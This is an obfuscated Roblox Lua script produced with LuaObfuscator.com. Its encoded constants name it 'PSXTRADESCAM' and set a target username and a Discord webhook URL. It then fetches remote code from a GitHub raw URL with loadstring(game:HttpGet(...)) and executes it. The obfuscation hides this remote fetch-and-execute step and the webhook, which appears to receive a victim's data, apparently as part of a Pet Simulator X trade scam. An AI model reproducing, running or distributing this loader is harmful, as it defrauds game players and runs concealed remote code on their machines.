--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v68=(v31/((929 -((331 -(32 + 85)) + 713))^(v32-(2 -1))))%(2^(((v33-(1 + 0)) -(v32-(2 -1))) + (1 -0))) ;return v68-(v68%(2 -1)) ;else local v69=(621 -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v69 + v69))>=v69) and (569 -(367 + 201))) or ((0 + 0) -0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1 -0) + 2 );v19=v19 + (354 -(87 + 263)) ;return (v37 * (16778173 -(892 + (245 -(67 + 113))))) + (v36 * (156337 -90801)) + (v35 * (472 -216)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 -0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38~=(394 -(232 + 160))) then else v43=nil;v44=nil;v38=4 -1 ;end if (v38==3) then v45=nil;while true do if (v39==(1278 -(37 + 1240))) then local v94=0;local v95;while true do if (v94~=(0 -0)) then else v95=0;while true do if (v95==0) then local v115=0 -0 ;while true do if (v115~=1) then else v95=1;break;end if (v115~=0) then else v43={v40,v41,nil,v42};v44=v24();v115=1;end end end if (v95~=(1 + 0)) then else v45={};v39=2;break;end end break;end end end if (v39==0) then local v96=0;while true do if (v96~=0) then else v40={};v41={};v96=1;end if (v96==1) then v42={};v39=1475 -(1329 + 145) ;break;end end end if (v39~=(973 -(140 + 831))) then else local v97=1850 -(1409 + 441) ;local v98;while true do if ((718 -(15 + 703))==v97) then v98=0 + 0 ;while true do if (v98==1) then for v117=1,v24() do local v118=438 -(262 + 176) ;local v119;local v120;local v121;while true do if (v118==(1721 -(345 + 1376))) then v119=0;v120=nil;v118=689 -(198 + 490) ;end if (v118==(4 -3)) then v121=nil;while true do if (v119==0) then local v130=0 -0 ;while true do if (v130==0) then v120=0;v121=nil;v130=1207 -(696 + 510) ;end if (v130==1) then v119=1 -0 ;break;end end end if (v119~=1) then else while true do if (v120~=(1262 -(1091 + 171))) then else v121=v22();if (v21(v121,1 + 0 ,3 -2 )==0) then local v159=0;local v160;local v161;local v162;local v163;local v164;while true do if (v159==(6 -4)) then v164=nil;while true do if ((374 -(123 + 251))~=v160) then else v161=0;v162=nil;v160=4 -3 ;end if ((699 -(208 + 490))==v160) then v163=nil;v164=nil;v160=2;end if (2==v160) then while true do if (v161~=1) then else local v180=0 + 0 ;local v181;while true do if (v180==(0 + 0)) then v181=836 -(660 + 176) ;while true do if (0~=v181) then else v164={v23(),v23(),nil,nil};if (v162==(202 -(14 + 188))) then local v195=675 -(534 + 141) ;local v196;local v197;while true do if (v195==0) then v196=0 + 0 ;v197=nil;v195=1 + 0 ;end if (v195==(1 + 0)) then while true do if (v196~=(0 -0)) then else v197=0;while true do if (v197==(0 -0)) then v164[8 -5 ]=v23();v164[3 + 1 ]=v23();break;end end break;end end break;end end elseif (v162==1) then v164[3]=v24();elseif (v162==(2 + 0)) then v164[3]=v24() -((398 -(115 + 281))^(37 -21)) ;elseif (v162==3) then local v204=0 + 0 ;local v205;local v206;while true do if ((0 -0)~=v204) then else v205=0;v206=nil;v204=3 -2 ;end if ((868 -(550 + 317))~=v204) then else while true do if (v205~=(0 -0)) then else v206=0 -0 ;while true do if (v206~=(0 -0)) then else v164[3]=v24() -(2^16) ;v164[4]=v23();break;end end break;end end break;end end end v181=1;end if (v181~=1) then else v161=287 -(134 + 151) ;break;end end break;end end end if (v161~=2) then else local v182=0;while true do if (v182==(1665 -(970 + 695))) then local v192=0;while true do if (0==v192) then if (v21(v163,1,1 -0 )==(1991 -(582 + 1408))) then v164[6 -4 ]=v45[v164[2]];end if (v21(v163,2 -0 ,7 -5 )~=1) then else v164[1827 -(1195 + 629) ]=v45[v164[3 -0 ]];end v192=242 -(187 + 54) ;end if (v192==1) then v182=1;break;end end end if (v182~=(781 -(162 + 618))) then else v161=3 + 0 ;break;end end end if (v161~=3) then else if (v21(v163,2 + 1 ,6 -3 )==1) then v164[6 -2 ]=v45[v164[1 + 3 ]];end v40[v117]=v164;break;end if (v161==(1636 -(1373 + 263))) then local v184=0;local v185;while true do if ((1000 -(451 + 549))==v184) then v185=0;while true do if (1==v185) then v161=1;break;end if (v185==(0 + 0)) then v162=v21(v121,2 -0 ,3);v163=v21(v121,6 -2 ,1390 -(746 + 638) );v185=1;end end break;end end end end break;end end break;end if (v159==1) then v162=nil;v163=nil;v159=1 + 1 ;end if (v159~=(0 -0)) then else v160=341 -(218 + 123) ;v161=nil;v159=1;end end end break;end end break;end end break;end end end v39=1584 -(1535 + 46) ;break;end if (v98~=(0 + 0)) then else for v122=1 + 0 ,v44 do local v123=560 -(306 + 254) ;local v124;local v125;local v126;local v127;while true do if (2==v123) then while true do if (v124~=0) then else v125=0 + 0 ;v126=nil;v124=1;end if (v124~=(1 -0)) then else v127=nil;while true do if (v125==(1468 -(899 + 568))) then if (v126==(1 + 0)) then v127=v22()~=0 ;elseif (v126==2) then v127=v25();elseif (v126~=3) then else v127=v26();end v45[v122]=v127;break;end if (v125==0) then local v148=0 -0 ;local v149;while true do if (v148~=0) then else v149=603 -(268 + 335) ;while true do if (v149==0) then v126=v22();v127=nil;v149=291 -(60 + 230) ;end if (v149==(573 -(426 + 146))) then v125=1;break;end end break;end end end end break;end end break;end if (v123==0) then v124=0 + 0 ;v125=nil;v123=1;end if (v123==1) then v126=nil;v127=nil;v123=2;end end end v43[3]=v22();v98=1;end end break;end end end if (v39~=3) then else for v105=1457 -(282 + 1174) ,v24() do v41[v105-(812 -(569 + 242)) ]=v29();end for v107=2 -1 ,v24() do v42[v107]=v24();end return v43;end end break;end if (v38==(0 + 0)) then v39=0;v40=nil;v38=1;end if (v38~=1) then else v41=nil;v42=nil;v38=2;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=(704 + 320) -(706 + 318) ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if ((1254 -(721 + 530))==v46) then if (v51==(1271 -(945 + 326))) then if (v50==(0 + 0)) then return v52 * (0 -(1257 -(1043 + 214))) ;else local v109=0 -(0 -0) ;while true do if ((0 + 0)==v109) then v51=115 -(4 + 110) ;v49=(1912 -(323 + 889)) -(271 + 429) ;break;end end end elseif (v51==2047) then return ((v50==(0 + 0)) and (v52 * (((3843 -2415) -(41 + 1386))/(1500 -(1408 + 92))))) or (v52 * NaN) ;end return v8(v52,v51-(2109 -(461 + 625)) ) * (v49 + (v50/((1290 -(993 + 295))^(3 + (629 -(361 + 219)))))) ;end if (v46==((1492 -(53 + 267)) -(418 + 753))) then v49=1 + 0 ;v50=(v21(v48,1 + 0 ,6 + 14 ) * ((1 + 1)^(70 -38))) + v47 ;v46=531 -(406 + 28 + 95) ;end if (v46==(5 -3)) then v51=v21(v48,1790 -(1749 + (433 -(15 + 398))) ,8 + 23 );v52=((v21(v48,1354 -(1249 + 73) )==(1 + 0)) and  -((2128 -(18 + 964)) -(466 + 679))) or (1 + 0) ;v46=3;end if (v46==(0 -0)) then v47=v24();v48=v24();v46=66 -(30 + 35) ;end end end v26=nil;function v26(v53)local v54=0 -0 ;local v55;local v56;while true do if (v54==(2 + 0)) then v56={};for v76=1 + 0 , #v55 do v56[v76]=v2(v1(v3(v55,v76,v76)));end v54=3;end if ((851 -(20 + 830))==v54) then v55=v3(v16,v19,(v19 + v53) -(1 + 0 + 0 + 0) );v19=v19 + v53 ;v54=128 -(116 + 10) ;end if (0==v54) then v55=nil;if  not v53 then local v83=(0 -0) + 0 ;while true do if (v83==0) then v53=v24();if (v53==(738 -((1389 -847) + 196))) then return "";end break;end end end v54=1 -0 ;end if (v54==(1 + 2)) then return v6(v56);end end end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + (1553 -(1126 + 425)) );v19=v19 + (407 -(118 + 287)) ;return (v59 * (1003 -747)) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v70=0;while true do if (v70==0) then v20=v0(v3(v60,1,1));return "";end end else local v71=0;local v72;while true do if (v71==0) then v72=v2(v0(v60,16));if v20 then local v110=v5(v72,v20);v20=nil;return v110;else return v72;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (0==v64) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1 ;local function v82()local v84=v65;local v85=v66;local v86=v67;local v87=v28;local v88={};local v89={};local v90={};for v99=1121 -(118 + 1003) ,v81 do if ((v99>=v86) or ((1597 -1051)>=(3061 -(142 + 235)))) then v88[v99-v86 ]=v80[v99 + (4 -(340 -(10 + 327))) ];else v90[v99]=v80[v99 + 1 + 0 + 0 ];end end local v91=(v81-v86) + ((1316 -(118 + 220)) -(553 + 424)) ;local v92;local v93;while true do local v100=0 -0 ;local v101;local v102;while true do if (((1291 + 174)<=(4267 + 34)) and ((0 + 0)==v100)) then v101=0 + 0 ;v102=nil;v100=1 + 0 ;end if (((3693 -1989)>1425) and (v100==(2 -1))) then while true do if ((v101==(0 -0)) or ((200 + 487)==4234)) then v102=0 -0 ;while true do if ((v102==1) or ((4083 -(239 + 514))<(168 + 334 + 927))) then if ((1147>=335) and (v93<=(1333 -((1246 -(108 + 341)) + 532)))) then if ((3435>(1524 + 573)) and (v93<=(1 + 0))) then if ((v93>0) or ((8864 -5094)>=(5243 -(373 + 829)))) then local v131=731 -(476 + 255) ;local v132;local v133;local v134;local v135;local v136;while true do if ((v131==1) or ((4921 -(369 + 761))<=(932 + 679))) then local v165=0 -0 ;while true do if (((0 -0)==v165) or ((4816 -(64 + 174))<=(129 + 157 + 1722))) then v134=nil;v135=nil;v165=1 -(0 -0) ;end if (((1461 -(144 + (1685 -(711 + 782))))<=(2292 -(42 + 174))) and (v165==(1 + 0))) then v131=(3 -1) + 0 ;break;end end end if ((v131==(0 + 0)) or (((2716 -(270 + 199)) -(363 + 1141))>=4399)) then local v166=1580 -(1183 + 397) ;while true do if (((3516 -2361)<(398 + 829 + 446)) and (v166==(1 + 0))) then v131=1976 -((3732 -(580 + 1239)) + (183 -121)) ;break;end if ((0==v166) or ((1464 + 860)<=(553 + 25))) then v132=0 -0 ;v133=nil;v166=1934 -(565 + 50 + 1318) ;end end end if (((14166 -10399)==(5428 -(1477 + 184))) and (v131==(2 -0))) then v136=nil;while true do if (((3810 + 279)==4089) and (v132==(856 -(564 + 128 + 164)))) then local v167=0 -0 ;while true do if (((13436 -8978)>=(4370 -2696)) and (v167==(305 -(244 + 60)))) then v132=1 + 0 + 0 ;break;end if (((1448 -((1208 -(645 + 522)) + 435))<=((4209 -(1010 + 780)) -(938 + 0 + 63))) and (v167==(0 + 0))) then local v175=0;while true do if ((v175==(1126 -(936 + 189))) or (4938<4762)) then v167=1 + 0 ;break;end if ((v175==0) or ((4117 -(1565 + (228 -180)))>4264)) then v133=v92[2 + 0 ];v134,v135=v87(v90[v133](v13(v90,v133 + (1139 -(782 + 356)) ,v92[270 -(176 + 91) ])));v175=1;end end end end end if (((5609 -(10127 -6671))==((5008 -(1045 + 791)) -1019)) and (v132==(1094 -(975 + 117)))) then for v172=v133,v79 do local v173=0;local v174;while true do if (((1875 -(157 + 1718))==v173) or (((1042 -630) + 95)>=(9197 -(10086 -3480)))) then v174=0;while true do if ((4481==(15319 -10838)) and (v174==(1018 -(697 + 321)))) then v136=v136 + (2 -1) ;v90[v172]=v134[v136];break;end end break;end end end break;end if ((v132==(1 -0)) or ((5366 -3038)<(270 + 423))) then local v168=0 -0 ;local v169;while true do if (((11602 -7274)==(5555 -(322 + 905))) and (v168==(505 -(351 + 154)))) then v169=(2185 -(1281 + 293)) -(602 + 9) ;while true do if ((1588>=(2521 -(449 + 740))) and (v169==0)) then v79=(v135 + v133) -(267 -(28 + 238)) ;v136=872 -(826 + 46) ;v169=948 -(245 + 702) ;end if ((v169==(3 -2)) or ((1342 + 2832)>(6146 -(260 + 1638)))) then v132=2;break;end end break;end end end end break;end end else local v137=(983 -543) -((1941 -(1381 + 178)) + 58) ;local v138;local v139;while true do if ((v137==((0 + 0) -0)) or ((3811 + 625 + 150)<=(169 -87))) then v138=0 -0 ;v139=nil;v137=1206 -(902 + 303) ;end if (((8481 -4618)==3863) and (v137==(2 -1))) then while true do if ((0==v138) or ((25 + 257)<=42)) then v139=v92[1 + 1 ];v90[v139]=v90[v139](v13(v90,v139 + (1691 -(1121 + 569)) ,v79));break;end end break;end end end elseif (((4823 -(22 + 192))>=(1449 -((1664 -1181) + 200))) and (v93<=(1465 -(1404 + 59)))) then do return;end elseif ((v93>(8 -5)) or ((1547 -395)==2488)) then v63[v92[3]]=v90[v92[767 -(468 + 297) ]];else v90[v92[2]]();end elseif (((3984 -(334 + 228))>3350) and (v93<=((11 + 9) -14))) then if (((2032 -1155)>376) and (v93>5)) then v90[v92[(472 -(381 + 89)) -0 ]]=v92[1 + 2 ];else v90[v92[238 -(141 + 95) ]][v92[3 + 0 + 0 ]]=v92[9 -5 ];end elseif ((v93<=(16 -9)) or ((495 + 236 + 2387)<=(5071 -3220))) then v90[v92[2 + (0 -0) ]]=v92[(1158 -(1074 + 82)) + 1 ]~=(0 -0) ;elseif ((v93==(5 + 3)) or ((328 -(92 + 71))>=(1725 + 1767))) then local v152=0 -(0 -0) ;local v153;local v154;local v155;local v156;while true do if (((4714 -(574 + (1975 -(214 + 1570))))<(4006 + 850)) and (v152==((1457 -(990 + 465)) -(1 + 0)))) then v155=nil;v156=nil;v152=1 + 1 + 0 + 0 ;end if ((v152==(851 -(254 + 595))) or (((17324 -12922) -(55 + 71))<(3972 -956))) then while true do if (((6480 -(573 + (2943 -(1668 + 58))))>4125) and (v153==(0 -0))) then v154=0 + 0 ;v155=nil;v153=1 -0 ;end if ((1==v153) or ((989 -(714 + 225))>=(2618 -1722))) then v156=nil;while true do if ((v154==(1 -0)) or ((186 + 1528)>=(4282 -1324))) then v90[v155 + (807 -(118 + 688)) ]=v156;v90[v155]=v156[v92[52 -(25 + 23) ]];break;end if ((v154==(0 + 0)) or ((3377 -(927 + 959))<(2170 -(2152 -(512 + 114))))) then local v179=732 -(16 + (1866 -1150)) ;while true do if ((704<((3936 -2032) -917)) and (v179==(98 -(11 + 86)))) then v154=1;break;end if (((9068 -5350)>1906) and (v179==(285 -(175 + 110)))) then local v191=0 -0 ;while true do if ((v191==(4 -3)) or ((3333 -2375)>(5431 -(503 + 1293)))) then v179=2 -1 ;break;end if (((2532 + 969)<=(2090 + 2402)) and (v191==(1061 -(810 + 251)))) then v155=v92[2];v156=v90[v92[1 + 2 + 0 + 0 ]];v191=1 + 0 ;end end end end end end break;end end break;end if ((v152==(0 + 0)) or ((3975 -(43 + 490))<2548)) then v153=733 -(711 + 22) ;v154=nil;v152=3 -2 ;end end else v90[v92[(2904 -2043) -(240 + 619) ]]=v63[v92[1 + 2 ]];end v78=v78 + 1 ;break;end if (((4573 -1698)>=(97 + 1367)) and (v102==(1744 -(1344 + 400)))) then local v128=405 -(255 + 150) ;local v129;while true do if ((v128==0) or ((3779 + (3012 -(109 + 1885)))>=(2620 + 2273))) then v129=0 -0 ;while true do if ((v129==(0 -0)) or ((2290 -(404 + 1335))>2068)) then v92=v84[v78];v93=v92[1];v129=407 -(183 + (1692 -(1269 + 200))) ;end if (((2571 -457)>944) and (v129==(1 + 0))) then v102=1 + 0 ;break;end end break;end end end end break;end end break;end end end end A,B=v28(v11(v82));if  not A[1] then local v103=0;local v104;while true do if (v103==0) then v104=v61[4][v78] or "?" ;error("Script error at ["   .. v104   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0D3O0003083O00557365724E616D65030B3O0049545A5F4A4F414F3O3703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130373337333631323135323932363337382F5A62553837356F654830676B334B6B646B54725A69464B48703451627A3471704F6B7972684A4345747951596A5673705A50582D42345556574D6677633039742D31635303023O005F47030A3O005363726970744E616D65030C3O0050535854524144455343414D030B3O0057616974696E6754696D65025O00806640030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403373O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F522F6D61696E2F4D61696E2E6C756100113O0012063O00023O0012043O00013O0012063O00043O0012043O00033O0012093O00053O0030053O000600070012093O00053O0030053O000800090012093O000A3O0012090001000B3O00200800010001000C0012060003000D4O0007000400014O0001000100049O0000022O00033O000100012O00023O00017O00113O00023O00023O00033O00033O00043O00043O00053O00053O00063O00063O00063O00063O00063O00063O00063O00063O00073O00",v9(),...);end